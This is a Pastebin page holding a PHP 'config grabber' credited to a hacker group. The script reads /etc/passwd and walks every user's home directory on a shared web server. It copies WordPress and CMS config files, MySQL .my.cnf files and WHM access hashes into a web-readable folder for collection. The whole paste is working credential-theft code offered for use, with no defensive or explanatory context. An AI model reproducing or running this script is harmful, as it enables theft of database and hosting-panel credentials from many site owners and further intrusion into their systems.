Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <? /*Config Grabber By AZZATSSINS CYBERSERKERS*/
- //$us = file_get_contents("/etc/passwd");
- $usa = fopen('/etc/passwd','r');
- $dir = mkdir('AZZATSSINS', 0777);
- $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
- $frr = fopen('AZZATSSINS/.htaccess', 'w');
- fwrite($frr, $rrrr);
- while($us = fgets($usa)){
- if($us==""){
- echo "<font color=red>can't read /etc/passwd</font>";
- }
- else{
- preg_match_all('/(.*?):x:/', $us, $user_byk);
- foreach($user_byk[1] as $user){
- $dir1 = "/home/$user/public_html/";
- if(is_readable($dir1)){
- system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS-azzatssins.txt');
- system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS-azzatssins.txt');
- system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC-azzatssins.txt');
- system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP-azzatssins.txt');
- system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM-azzatssins.txt');
- }
- else{
- }
- }
- }
- } system('rm AZZATSSINS/.htaccess');
- echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; ?>
Add Comment
Please, Sign In to add comment